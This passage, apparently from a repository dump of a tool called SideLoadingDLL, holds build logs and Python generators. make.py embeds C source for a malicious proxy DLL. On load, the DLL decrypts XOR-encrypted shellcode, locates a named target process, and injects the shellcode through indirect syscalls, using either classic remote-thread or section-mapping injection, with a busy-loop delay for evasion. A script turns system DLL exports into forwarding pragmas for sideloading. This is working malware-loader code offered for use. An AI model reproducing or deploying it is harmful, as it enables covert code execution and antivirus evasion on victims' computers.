8 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(214,1): warning C4047: 'initializing': 'DWORD' differs in levels of indirection from 'void *'
9 | RecycleGate.c
10 | Previous IPDB not found, fall back to full compilation.
11 | dllmain.obj : warning LNK4104: export of symbol 'DllCanUnloadNow' should be PRIVATE
12 | dllmain.obj : warning LNK4104: export of symbol 'DllGetClassObject' should be PRIVATE
13 | dllmain.obj : warning LNK4104: export of symbol 'DllRegisterServer' should be PRIVATE
14 | dllmain.obj : warning LNK4104: export of symbol 'DllUnregisterServer' should be PRIVATE
15 | Creating library C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\x64\Release\SideLoadingDLL.lib and object C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\x64\Release\SideLoadingDLL.exp
16 | Generating code
17 | All 13 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
18 | Finished generating code
19 | SideLoadingDLL.vcxproj -> C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\x64\Release\SideLoadingDLL.dll
20 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/Masm.read.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/Masm.read.1u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/Masm.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/Masm.write.1u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/SideLoadingDLL.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.34.31933:TargetPlatformVersion=10.0.22000.0:
2 | Release|x64|C:\Users\MaorPT\Desktop\Github\SideLoadingDLL\SideLoadingDLL\|
3 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.write.2u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.tlog/link.write.2u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/dllmain.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/dllmain.obj
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\vc143.pdb
2 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\recyclegate.obj
3 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\dllmain.obj
4 | c:\users\maor-pt\source\repos\userenv-syscalls\x64\release\userenv-syscalls.dll
5 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.ipdb
6 | c:\users\maor-pt\source\repos\userenv-syscalls\x64\release\userenv-syscalls.pdb
7 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.iobj
8 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\gatetrampolin.obj
9 | c:\users\maor-pt\source\repos\userenv-syscalls\x64\release\userenv-syscalls.lib
10 | c:\users\maor-pt\source\repos\userenv-syscalls\x64\release\userenv-syscalls.exp
11 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\cl.command.1.tlog
12 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\cl.read.1.tlog
13 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\cl.write.1.tlog
14 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\link.command.1.tlog
15 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\link.read.1.tlog
16 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\link.write.1.tlog
17 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\masm.read.1u.tlog
18 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\masm.write.1u.tlog
19 | c:\users\maor-pt\source\repos\userenv-syscalls\userenv-syscalls\x64\release\userenv-syscalls.tlog\userenv-syscalls.write.1u.tlog
20 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.dll.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | C:\Users\Maor-PT\source\repos\userenv-syscalls\x64\Release\userenv-syscalls.dll
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.log:
--------------------------------------------------------------------------------
1 | Assembling GateTrampolin.asm...
2 | dllmain.c
3 | C:\Users\Maor-PT\source\repos\userenv-syscalls\userenv-syscalls\dllmain.c(137,42): warning C4311: 'type cast': pointer truncation from 'HANDLE' to 'int'
4 | C:\Users\Maor-PT\source\repos\userenv-syscalls\userenv-syscalls\dllmain.c(192,35): warning C4312: 'type cast': conversion from 'int' to 'PVOID' of greater size
5 | C:\Users\Maor-PT\source\repos\userenv-syscalls\userenv-syscalls\dllmain.c(188,35): warning C4244: 'initializing': conversion from 'SIZE_T' to 'DWORD', possible loss of data
6 | C:\Users\Maor-PT\source\repos\userenv-syscalls\userenv-syscalls\dllmain.c(217,1): warning C4047: 'initializing': 'DWORD' differs in levels of indirection from 'void *'
7 | C:\Users\Maor-PT\source\repos\userenv-syscalls\userenv-syscalls\dllmain.c(218,1): warning C4047: 'initializing': 'DWORD' differs in levels of indirection from 'void *'
8 | RecycleGate.c
9 | dllmain.obj : warning LNK4104: export of symbol 'DllCanUnloadNow' should be PRIVATE
10 | dllmain.obj : warning LNK4104: export of symbol 'DllGetClassObject' should be PRIVATE
11 | dllmain.obj : warning LNK4104: export of symbol 'DllRegisterServer' should be PRIVATE
12 | dllmain.obj : warning LNK4104: export of symbol 'DllUnregisterServer' should be PRIVATE
13 | Creating library C:\Users\Maor-PT\source\repos\userenv-syscalls\x64\Release\userenv-syscalls.lib and object C:\Users\Maor-PT\source\repos\userenv-syscalls\x64\Release\userenv-syscalls.exp
14 | Generating code
15 | Previous IPDB not found, fall back to full compilation.
16 | All 13 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
17 | Finished generating code
18 | userenv-syscalls.vcxproj -> C:\Users\Maor-PT\source\repos\userenv-syscalls\x64\Release\userenv-syscalls.dll
19 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/Masm.read.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/Masm.read.1u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/Masm.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/Masm.write.1u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/userenv-syscalls.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.30.30705:TargetPlatformVersion=10.0.22000.0:
2 | Release|x64|C:\Users\Maor-PT\source\repos\userenv-syscalls\|
3 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/userenv-syscalls.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.tlog/userenv-syscalls.write.1u.tlog
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/userenv-syscalls.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/SideLoadingDLL/x64/Release/SideLoadingDLL.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/x64/Release/SideLoadingDLL.dll
--------------------------------------------------------------------------------
/SideLoadingDLL/x64/Release/SideLoadingDLL.exp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/x64/Release/SideLoadingDLL.exp
--------------------------------------------------------------------------------
/SideLoadingDLL/x64/Release/SideLoadingDLL.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/x64/Release/SideLoadingDLL.lib
--------------------------------------------------------------------------------
/SideLoadingDLL/x64/Release/SideLoadingDLL.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/x64/Release/SideLoadingDLL.pdb
--------------------------------------------------------------------------------
/demo/screen-capture.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/demo/screen-capture.gif
--------------------------------------------------------------------------------
/get_exports.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import pefile
3 |
4 | def proxyFunctions(targetDLL):
5 | targetDLL = targetDLL.replace("\\", "/") if "\\" in targetDLL else targetDLL
6 |
7 | # If our dll can be found in the system32 directory let's not make a copy and telling dll where is the original
8 | if targetDLL.lower().startswith("c:/windows/system32"):
9 |
10 | pe = pefile.PE(targetDLL)
11 | dll = targetDLL.replace("/", "\\\\").split(".dll")[0]
12 | d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
13 | pe.parse_data_directories(directories=d)
14 | exports = [(e.ordinal, e.name.decode()) for e in pe.DIRECTORY_ENTRY_EXPORT.symbols if e.name]
15 | pragma_list = []
16 |
17 | for e in exports:
18 | pragma_list.append('#pragma comment(linker,"/export:{func}={dll}.{func},@{ord}")'.format(func=e[1], dll=dll, ord=e[0]))
19 |
20 | return pragma_list
21 |
22 |
23 | def main():
24 | if len(sys.argv) != 2:
25 | print("Usage main.py ")
26 | exit(1)
27 | print(proxyFunctions(sys.argv[1]))
28 |
29 |
30 | if _name_ == "_main_":
31 | main()
32 |
--------------------------------------------------------------------------------
/make.py:
--------------------------------------------------------------------------------
1 | import optparse
2 | import sys
3 | import os
4 | import pefile
5 |
6 | dllmain = """// dllmain.c : Defines the entry point for the DLL application.
7 | #include "windows.h"
8 | #include "Defines.h"
9 | #include "RecycleGate.h"
10 | #include "stdio.h"
11 |
12 | #define STATUS_SUCCESS 0
13 |
14 | extern void PrepareSyscall(DWORD dwSycallNr, PVOID dw64Gate);
15 | extern DoSyscall();
16 |
17 | pragma_functions_placeholder
18 |
19 | char key[] = "xor_key_placeholder";
20 |
21 |
22 | void XOR(char* data, size_t data_len, char* key, size_t key_len) {
23 | int j;
24 |
25 | j = 0;
26 | for (int i = 0; i < data_len; i++) {
27 | if (j == key_len - 1) j = 0;
28 |
29 | data[i] = data[i] ^ key[j];
30 | j++;
31 | }
32 | }
33 |
34 | void sleep()
35 | {
36 | for (int i = 0; i <= 500000; i++)
37 | {
38 | for (int j = 2; j <= i / 2; j++)
39 | {
40 | if (i % j == 0)
41 | {
42 | break;
43 | }
44 | }
45 | }
46 | }
47 |
48 | HANDLE findTarget(char* target)
49 | {
50 | NTSTATUS status;
51 | PVOID buffer;
52 | PSYSTEM_PROCESS_INFO spi;
53 |
54 | buffer = VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // We need to allocate a large buffer because the process list can be large.
55 |
56 | if (!buffer)
57 | {
58 | return -1;
59 | }
60 |
61 | spi = (PSYSTEM_PROCESS_INFO)buffer;
62 |
63 | Syscall sysNtQuerySystemInformation = { 0x00 };
64 | DWORD dwSuccess = FAIL;
65 |
66 | dwSuccess = getSyscall(0xaf0d30ec, &sysNtQuerySystemInformation);
67 | if (dwSuccess == FAIL)
68 | return 0x01;
69 |
70 | PrepareSyscall(sysNtQuerySystemInformation.dwSyscallNr, sysNtQuerySystemInformation.pRecycledGate);
71 | if (!NT_SUCCESS(status = DoSyscall(SystemProcessInformation, spi, 1024 * 1024, NULL)))
72 | {
73 | VirtualFree(buffer, 0, MEM_RELEASE);
74 | return -1;
75 | }
76 |
77 | while (spi->NextEntryOffset) // Loop over the list until we reach the last entry.
78 | {
79 | wchar_t pName[256];
80 | memset(pName, 0, sizeof(pName));
81 | WideCharToMultiByte(CP_ACP, 0, spi->ImageName.Buffer, spi->ImageName.Length, (LPSTR)pName, sizeof(pName), NULL, NULL);
82 |
83 | int result = my_strcmp(target, (char*)pName);
84 | if (!result) {
85 | HANDLE pid = (HANDLE)spi->ProcessId;
86 | VirtualFree(buffer, 0, MEM_RELEASE); // Free the allocated buffer.
87 | return pid;
88 | }
89 |
90 | spi = (PSYSTEM_PROCESS_INFO)((LPBYTE)spi + spi->NextEntryOffset); // Calculate the address of the next entry.
91 |
92 | }
93 | VirtualFree(buffer, 0, MEM_RELEASE); // Free the allocated buffer.
94 | return 0;
95 | }
96 |
97 |
98 | memcpy_placeholder
99 |
100 |
101 | int ProxyFunction()
102 | {
103 | HANDLE file = NULL;
104 | DWORD fileSize = NULL;
105 | DWORD bytesRead = NULL;
106 | LPVOID fileData = NULL;
107 |
108 | // Reading our encrypted shellcode
109 | file = CreateFileA("shellcode_file_placeholder", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
110 | if (file == INVALID_HANDLE_VALUE) {
111 | return 1;
112 | }
113 | fileSize = GetFileSize(file, NULL);
114 | fileData = HeapAlloc(GetProcessHeap(), 0, fileSize);
115 | ReadFile(file, fileData, fileSize, &bytesRead, NULL);
116 | unsigned char* shellcode = (unsigned char*)fileData;
117 |
118 | HANDLE Entry = findTarget("target_process_placeholder"); // Targeting the target_process_placeholder process
119 | Syscall sysZwOpenProcess = { 0x0 };
120 | NTSTATUS dwSuccess = FAIL;
121 | HANDLE hProc = 0;
122 |
123 | dwSuccess = getSyscall(0xda1009c3, &sysZwOpenProcess);
124 | if (dwSuccess == FAIL)
125 | return 0x01;
126 |
127 | OBJECT_ATTRIBUTES oa;
128 | CLIENT_ID cid = { (HANDLE)Entry, NULL };
129 | InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
130 | PrepareSyscall(sysZwOpenProcess.dwSyscallNr, sysZwOpenProcess.pRecycledGate);
131 | DoSyscall(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);
132 |
133 | if (hProc != NULL)
134 | {
135 | technique_function_placeholder
136 | }
137 | return 0;
138 | }
139 |
140 |
141 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
142 | {
143 | switch (ul_reason_for_call)
144 | {
145 | case DLL_PROCESS_ATTACH:
146 | ProxyFunction();
147 | break;
148 | case DLL_THREAD_ATTACH:
149 | case DLL_THREAD_DETACH:
150 | case DLL_PROCESS_DETACH:
151 | break;
152 | }
153 | return TRUE;
154 | }
155 |
156 | """
157 |
158 | classic_injection = """Syscall sysNtAllocateVirtualMemory = { 0x0 };
159 | Syscall sysNtWriteVirtualMemory = { 0x0 };
160 | Syscall sysNtCreateThreadEx = { 0x0 };
161 |
162 | DWORD dwSuccess = FAIL;
163 | // Prepare the syscalls
164 | dwSuccess = getSyscall(0x26d18008, &sysNtAllocateVirtualMemory);
165 | if (dwSuccess == FAIL)
166 | return 0x01;
167 | dwSuccess = getSyscall(0xd4b1e4d6, &sysNtWriteVirtualMemory);
168 | if (dwSuccess == FAIL)
169 | return 0x01;
170 | dwSuccess = getSyscall(0x8a4e6274, &sysNtCreateThreadEx);
171 | if (dwSuccess == FAIL)
172 | return 0x01;
173 | // Initialing the varibales
174 | HANDLE threadHandle = NULL;
175 | LPVOID ds = NULL;
176 | SIZE_T wr;
177 | SIZE_T shellcodeSize = fileSize;
178 |
179 | XOR((char*)shellcode, shellcodeSize, (char*)key, sizeof(key)); // Decrypting the shellcode
180 |
181 | sleep(); // Own implementation of sleep function
182 |
183 | PrepareSyscall(sysNtAllocateVirtualMemory.dwSyscallNr, sysNtAllocateVirtualMemory.pRecycledGate);
184 | DoSyscall(hProc, &ds, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
185 |
186 | PrepareSyscall(sysNtWriteVirtualMemory.dwSyscallNr, sysNtWriteVirtualMemory.pRecycledGate);
187 | DoSyscall(hProc, ds, shellcode, shellcodeSize-1, &wr);
188 |
189 | PrepareSyscall(sysNtCreateThreadEx.dwSyscallNr, sysNtCreateThreadEx.pRecycledGate);
190 | DoSyscall(&threadHandle, THREAD_ALL_ACCESS, &oa, hProc, (LPTHREAD_START_ROUTINE)ds, ds, FALSE, 0, 0, 0, NULL);"""
191 |
192 | mapviewsection_injection = """Syscall sysZwCreateSection = { 0x0 };
193 | Syscall sysNtMapViewOfSection = { 0x0 };
194 | Syscall sysNtCreateThreadEx = { 0x0 };
195 | Syscall sysNtResumeThread = { 0x0 };
196 | Syscall sysNtDelayExeuction = { 0x0 };
197 |
198 | DWORD dwSuccess = FAIL;
199 | // Prepare the syscalls
200 | dwSuccess = getSyscall(0x6805b1fb, &sysZwCreateSection);
201 | if (dwSuccess == FAIL)
202 | return 0x01;
203 |
204 | dwSuccess = getSyscall(0x625d5a2e, &sysNtMapViewOfSection);
205 | if (dwSuccess == FAIL)
206 | return 0x01;
207 |
208 | dwSuccess = getSyscall(0x8a4e6274, &sysNtCreateThreadEx);
209 | if (dwSuccess == FAIL)
210 | return 0x01;
211 |
212 | dwSuccess = getSyscall(0x6d397e74, &sysNtResumeThread);
213 | if (dwSuccess == FAIL)
214 | return 0x01;
215 |
216 | SIZE_T shellcodeSize = fileSize;
217 | HANDLE hSection = NULL;
218 | NTSTATUS status = NULL;
219 | SIZE_T size = fileSize;
220 | LARGE_INTEGER sectionSize = { size };
221 | PVOID pLocalView = NULL, pRemoteView = NULL;
222 | int viewUnMap = 2;
223 |
224 | XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
225 |
226 | PrepareSyscall(sysZwCreateSection.dwSyscallNr, sysZwCreateSection.pRecycledGate);
227 | if ((status = DoSyscall(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
228 | return -1;
229 | }
230 |
231 |
232 | PrepareSyscall(sysNtMapViewOfSection.dwSyscallNr, sysNtMapViewOfSection.pRecycledGate);
233 | if ((status = DoSyscall(hSection, GetCurrentProcess(),
234 | &pLocalView, NULL, NULL, NULL,
235 | (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
236 | return -1;
237 | }
238 |
239 |
240 | VxMoveMemory(pLocalView, shellcode, shellcodeSize);
241 |
242 | PrepareSyscall(sysNtMapViewOfSection.dwSyscallNr, sysNtMapViewOfSection.pRecycledGate);
243 | if ((status = DoSyscall(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
244 | (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
245 | return -1;
246 | }
247 |
248 |
249 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
250 | PrepareSyscall(sysNtCreateThreadEx.dwSyscallNr, sysNtCreateThreadEx.pRecycledGate);
251 | if (( status = DoSyscall(&hHostThread, THREAD_ALL_ACCESS, &oa, hProc, (LPTHREAD_START_ROUTINE)pRemoteView, pRemoteView, FALSE, 0, 0, 0, NULL)) != STATUS_SUCCESS)
252 | {
253 | return -1;
254 | }
255 |
256 | PrepareSyscall(sysNtResumeThread.dwSyscallNr, sysNtResumeThread.pRecycledGate);
257 | DoSyscall(hHostThread);"""
258 |
259 | memcopy_function = """PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
260 | char* d = (char*)dest;
261 | char* s = (char*)src;
262 | if (d < s)
263 | while (len--)
264 | *d++ = *s++;
265 | else {
266 | char* lasts = s + (len - 1);
267 | char* lastd = d + (len - 1);
268 | while (len--)
269 | *lastd-- = *lasts--;
270 | }
271 | return dest;
272 | }"""
273 |
274 | def logBanner():
275 | banner =r"""
276 | __ _ _ __ _ _ ___ __ __
277 | / _(_) __| | ___ / / ___ __ _ __| (_)_ __ __ _ / \/ / / /
278 | \ \| |/ _` |/ _ \/ / / _ \ / _` |/ _` | | '_ \ / _` | / /\ / / / /
279 | _\ \ | (_| | __/ /__| (_) | (_| | (_| | | | | | (_| |/ /_// /___/ /___
280 | \__/_|\__,_|\___\____/\___/ \__,_|\__,_|_|_| |_|\__, /___,'\____/\____/
281 | |___/
282 |
283 | SideLoadingDLL! Made by MaorSabag!! v1.1
284 |
285 | """
286 | print (banner)
287 |
288 | def xor(data, key):
289 | key = str(key)
290 | l = len(key)
291 | output_str = ""
292 |
293 | for i in range(len(data)):
294 | current = data[i]
295 | current_key = key[i % len(key)]
296 | try:
297 | output_str += chr(current ^ ord(current_key))
298 | except:
299 | output_str += chr(ord(current) ^ ord(current_key))
300 |
301 | return output_str
302 |
303 | def encryptShellcode(raw_shellcode, output_filename, KEY):
304 | plaintext = open(raw_shellcode, "rb").read()
305 | ciphertext = xor(plaintext, KEY)
306 | hex_cipher = '\\x' + '\\x'.join(hex(ord(x))[2:].zfill(2) for x in ciphertext) + ''
307 |
308 | python_file = """a=b"replace_me";h=open("name_replace", "wb");h.write(a);h.close()""".replace(r"replace_me", hex_cipher).replace(r"name_replace", output_filename) # For real I couln't make the xor encryption work in any other way....
309 |
310 | exec(python_file)
311 |
312 |
313 | def proxyFunctions(targetDLL):
314 | targetDLL = targetDLL.replace("\\", "/") if "\\" in targetDLL else targetDLL
315 |
316 | # If our dll can be found in the system32 directory let's not make a copy and telling dll where is the original
317 | if targetDLL.lower().startswith("c:/windows/system32"):
318 |
319 | pe = pefile.PE(targetDLL)
320 | dll = targetDLL.replace("/", "\\\\").split(".dll")[0]
321 | d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
322 | pe.parse_data_directories(directories=d)
323 | exports = [(e.ordinal, e.name.decode()) for e in pe.DIRECTORY_ENTRY_EXPORT.symbols if e.name]
324 | pragma_list = []
325 |
326 | for e in exports:
327 | pragma_list.append('#pragma comment(linker,"/export:{func}={dll}.{func},@{ord}")'.format(func=e[1], dll=dll, ord=e[0]))
328 |
329 | return pragma_list
330 |
